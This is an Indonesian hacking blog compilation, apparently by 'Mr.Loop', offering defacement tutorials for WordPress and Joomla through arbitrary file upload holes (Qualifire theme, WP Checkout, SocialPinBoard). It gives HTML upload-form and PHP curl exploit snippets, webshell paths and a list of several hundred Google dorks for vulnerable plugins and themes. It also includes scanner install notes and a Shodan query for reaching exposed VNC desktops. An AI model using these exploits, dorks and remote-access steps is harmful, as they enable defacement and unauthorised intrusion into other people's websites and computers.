Deface wordpress dengan exploit themes qualifire file upload

Yuppp.. lama ya tidak share exploit deface,sbnrnya saya tidak suka sama deface,hehe,. Kali ini saya mau share tutorial deface Wordpress dengan Exploit Themes Qualifire File Upload Vulnerability . Exploit nya sudah lama sih sebenarnya, namun gak tau kenapa sekarang "bersemi kembali" . Oke gak usah lama lama , langsung saja .
Bahan :
HTML Exploit : download
Google Dorks :
Use your brain, bitch !
Vuln :

Simpan exploit di atas dengan format .html. Jangan lupa ganti url nya dengan url target.
Setelah itu buka file exploit nya di browser.

Shell kalian akan berada di localhost/shell.php
Karena langsung berada di public_html, jika kalian hanya ingin deface, bisa langsung pload script.

Sekian tutor Deface Wordpress dengan Exploit Themes Qualifire File Upload Vulnerability kali ini, happy exploiting.

tools for information gathering

tools for information gathering
yang suka kepoin website nih Mr.Loop bagi,,Nama nya AngryFuzzer
AngryFuzzer - alat untuk mengumpulkan informasi
AngryFuzz3r adalah kumpulan alat untuk pentesting untuk mengumpulkan informasi dan menemukan kerentanan target berdasarkan proyek Fuzzedb
UrlFuzz3r-> AngryFuzz3r_1

Temukan file dan direktori tersembunyi di server web. Aplikasi ini mencoba untuk menemukan url path relatif dari situs web yang diberikan dengan membandingkannya dengan himpunan yang diberikan.


$ python -h
Usage: [options]

  -h, --help            show this help message and exit
  -q, --quiet           Silent mode ,only repport
  -u URL, --url=URL      URL of the Target
  -c CMS, --cms=CMS     scan CMS ==> wp ,dp
  -w WORDLIST, --wordlist=WORDLIST
                        Custom wordlist
  • Fuzzing an url with default dictionnaire
python -u
  • Fuzzing CMS (wp: in this exemple !)
python -u --cms wp
  • Fuzzing a custom Wordlist
python -u -w fuzzdb/discovery/predictable-filepaths/php/PHP.txt

How to install

$ git clone $ cd angryFuzzer $ python DOWNLOAD

tool terbaru pencari bug SQL

tool terbaru  pencari bug SQL
Hallo shabat mr.loop saya akan membagikan tool pentesting yang gk ribet buat yang mau cari bug sql, sbnrnya tool ini udah di rilis 4 mnggu yang lalu, dan skrang sya mau bgikan tool nya,
Tool nya bernama viSQL nih lihat dulu cara installnya :

viSQL - Scan SQL vulnerability on target site and sites of on server

viSQL -  Scan SQL vulnerability on target site and sites of on server
~$ git clone
~$ cd viSQL
~# python2 -m pip install -r requirements.txt
~$ python2 --help
ATAU mau kesini juga gk ppa.. 

Cara Install Python di Windows

Cara Install Python di Windows 

 Python merupakan bahasa pemrograman tingkat tinggi simpel handal yang diperuntukkan untuk layanan desktop dan web.

 Cara Menginstall Python di Windows
Pertama, silahkan download installasi python melalui situs resminya SINI Antara versi 2 dan 3 sebenarnya fungsinya sama saja, hanya sedikit perbedaan di syntax, untuk referensi lebih lanjut bisa sobat baca di Google😄. Kali ini saya memilih yang versi 2.7.13

Jika sudah selesai terdownload, klik 2x pada file installasi python

Pilih Install for all users agar python dapat terintegrasi di semua akun Windows (Administrator dan guest). Lalu klik Next
Selanjutnya, pilih letak folder installasi untuk pythonnya atau biarkan secara default terinstall di Local Disk C.
Kemudian klik Next

Langsung Next saja

Tunggu proses installasi hingga selesai

Langkah terakir klik Finish, maka Python sudah sukses terinstall di Windows milik sobat

Cara Deface WordPress Plugins WP Checkout - Arbitrary File Upload

WordPress Plugins WP Checkout - Arbitrary File Upload

# Exploit Title: WordPress Plugins WP Checkout - Arbitrary File Upload
# Google Dork: inurl:/wp-content/plugins/wp-checkout
# Tested on: Windows 7

1) Search target with Google Dorking
Index of /wp-content/plugins/wp-checkout/

2) Exploit the websites
Vulnerability? Page Blank!

3) Proof of concept (PoC)
<form method="POST" action="https://localhost/wp-content/plugins/wp-checkout/vendors/uploadify/upload.php" enctype="multipart/form-data">
<input type="file" name="Filedata" />

4) Result file access.

Joomla SocialPinBoard Arbitrary File Upload

Joomla SocialPinBoard Arbitrary File Upload

#TItle: SocialPinBoard AFU (Arbitrary File Upload)
#Author: Con7ext
#Tested On Windows Xp And Linux Ubuntu
#Powered By Socialpinboard
#index of /mod_socialpinboard_menu/
#index of /socialpinboard/
#inurl:/modules/ "Socialpinboard"
Path Of Exploit:
Path Of Shell:/modules/mod_socialpinboard_menu/images/socialpinboard/temp/RANDOMresult.php

Exploit (PHP):
$ch = curl_init("");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
print "$postResult";

Exploit (HTML):
<form method="POST" action="" enctype="multipart/form-data">
<input type="file" name="uploadfile" /><button>Upload</button>

Dork wordpresss fresh 2017

Dork Wordpress Fresh 2017-2018

Commot silahkan:
Baut yang maen WP :v Tinggal Comot saja gan :P

  1. inurl: wp-content/plugins/front-end-upload /
  2. inurl: wp-content/plugins/omni-secure-files /
  3. inurl :/ wp-content/plugins/rbxgallery /
  4. inurl :/ wp-content/plugins/wpstorecart /
  5. allinurl :/ wp-content/plugins/wp-easy-gallery /
  6. inurl: wp-content/plugins/front-file-manager /
  7. inurl :/ wp-content/plugins/html5avmanager /
  8. inurl :/ wp-content/plugins/store-locator-le /
  9. inurl :/ wp-content/plugins/wp-property /
  10. inurl :/ wp-content/plugins/HT-Poi /
  11. inurl :/ eklentileri / HT-Poi /
  12. inurl :/ wp-content/plugins/nmedia-user-file-uploader /
  13. inurl :/ wp-content/plugins/foxypress /
  14. inurl :/ wp-content/plugins/comment-extra-field /
  15. inurl :/ wp-content/plugins/asset-manager /
  16. inurl :/ wp-content/plugins/wordpress-member-private-conversation /
  17. inurl :/ wp-content/plugins/gallery-plugin /
  18. inurl :/ wp-content/plugins/fcchat /
  19. inurl :/ wp-content/plugins/font-uploader /
  20. inurl :/ wp-content/plugins/mm-forms-community /
  21. inurl :/ wp-content/plugins/videowhisper-video-presentation /
  22. inurl :/ wp-content/plugins/hungred-post-thumbnail /
  23. inurl :/ wp-content/plugins/pdw-file-browser /
  24. inurl :/ wp-content/plugins/picturesurf-gallery /
  25. / Wp-content/plugins/allwebmenus-wordpress-menu-plugin/actions.php
  26. inurl: eklentileri / sb-uploader
  27. inurl: eklentileri / dekan-fckeditor-ile-pwwangs-kodu-plugin-için-wordpress /
  28. inurl: wp-content/plugins/topquark/lib / js / fancyupload / vitrin / toplu /
  29. inurl: wp-content/plugins/custom-content-type-manager /
  30. inurl: wp-content/plugins/user-****/framework/helper /
  31. inurl :/ stilleri / admin_tpl /
  32. inurl: wp-content/plugins/pica-photo-gallery /
  33. inurl: wp-content/plugins/drag-drop-file-uploader /
  34. inurl: module_fichier / upload / upload_filemanager.php
  35. inurl :/ modules / filemanager / xupload.php
  36. inurl :/ wp-content/plugins/videowhisper-video-conference-integration /
  37. inurl :/ medya / easyflashuploader / swfs /
  38. inurl :/ wp-content/plugins/auctionPlugin /
  39. inurl :/ modules / mod_jfancy /
  40. inurl :/ images / idoblog / yükleme
  41. inurl :/ bileşenleri / com_dv / formaliteler
  42. inurl :/ modules / mod_artuploader /
  43. inurl :/ wp-content/plugins/contus-hd-flv-player /
  44. inurl :/ wp-content/plugins/contus-video-galleryversion-10 /
  45. inurl :/ yönetici / bileşenleri / com_simpleswfupload
  46. inurl :/ wp-content/plugins/annonces/admin /
  47. inurl :/ wp-content/plugins/evarisk /
  48. inurl :/ wp-content/plugins/invit0r /
  49. inurl :/ wp-content/plugins/zingiri-web-shop /
  50. inurl :/ bileşenleri / com_maianmedia /
  51. inurl :/ modules / mod_dionefileuploader /
  52. inurl :/ bileşenleri / com_hwdvideoshare
  53. inurl :/ wp-content/themes/deep-blue /
  54. inurl :/ wp-content/plugins/lim4wp /
  55. inurl :/ wp-content/themes/famous /
  56. inurl :/ wp-content/plugins/lb-mixed-slideshow /
  57. / Wp-content/themes/TheStyle /
  58. / Wp-content/themes/nool /
  59. / Wp-content/themes/PersonalPress /
  60. / Wp-content/themes/SimplePress /
  61. / Wp-content/themes/DeepFocus /
  62. / Wp-content/themes/DelicateNews /
  63. / Wp-content/themes/Bold /
  64. / Wp-content/themes/eStore /
  65. / / Wp-content/themes/TheProfessional
  66. / Wp-content/themes/OnTheGo /
  67. / Wp-content/themes/AskIt /
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  70. / Wp-content/themes/eVid /
  71. / Wp-content/themes/TheCorporation /
  72. / Wp-content/themes/Minimal /
  73. / / Wp-content/themes/Polished
  74. / Wp-content/themes/MyResume /
  75. / Wp-content/themes/TheSource /
  76. / Wp-content/themes/StudioBlue /
  77. / Wp-content/themes/Wooden /
  78. / Wp-content/themes/WhosWho /
  79. / Wp-content/themes/Quadro /
  80. / Wp-content/themes/Glow /
  81. / / Wp-content/themes/Modest
  82. / / Wp-content/themes/Aggregate
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  274. / / Wp-content/themes/constructor/libs
  275. / Wp-content/themes/constructor /
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  306. / / Wp-content/themes/inuit-types
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  308. / Wp-content/themes/iwana-v10 /
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  310. / Wp-content/themes/jcblackone /
  311. / / Wp-content/themes/kratalistic
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  320. / / Wp-content/themes/make-money-online-theme-3/scripts
  321. / / Wp-content/themes/make-money-online-theme-4/scripts
  322. / / Wp-content/themes/make-money-online-theme/scripts
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  325. / Wp-content/themes/moi-magazine /
  326. / / Wp-content/themes/my-heli/images
  327. / Wp-content/themes/mymag /
  328. / Wp-content/themes/mystique/extensions/auto-thumb /
  329. / Wp-content/themes/nash/theme-assets/php /
  330. / Wp-content/themes/neofresh /
  331. / / Wp-content/themes/neo_wdl/includes/extensions
  332. / / Wp-content/themes/new-green-natural-living-ngnl/scripts
  333. / Wp-content/themes/newspress /
  334. / / Wp-content/themes/pearlie/scripts
  335. / / Wp-content/themes/pico/scripts
  336. / / Wp-content/themes/postage-sydney/includes
  337. / Wp-content/themes/premium-violet /
  338. / Wp-content/themes/probluezine /
  339. / Wp-content/themes/pronto/cjl/pronto/uploadify/check.php
  340. / Wp-content/themes/pronto/cjl/pronto/uploadify/uploadify.php
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Remote pc With vnc + shodan

Mr.Loop mau beritahu rahasia kpada sobat trcinta>heheh. yaitu remote pc lewat vnc tapi mr.loop gunakan
1. pertama sobat dirumah harus login dulu di 
2.kedua masukan dengan dork nya di kolom seracrh (  has_screenshot:true port:5900 ) boleh kalian edit dengan otak enstein nya.. hehe boleh ditmbhkan dengan (country: my )terserah mau pake id,us,

3.setelah di search akan mncul bnyak srpti gmbar di bawah ini sob

4.lallu masukan deh tarraa....kalo sudah gini kita oprek deh..heheh😂okee sekian dari Mr.loop 👍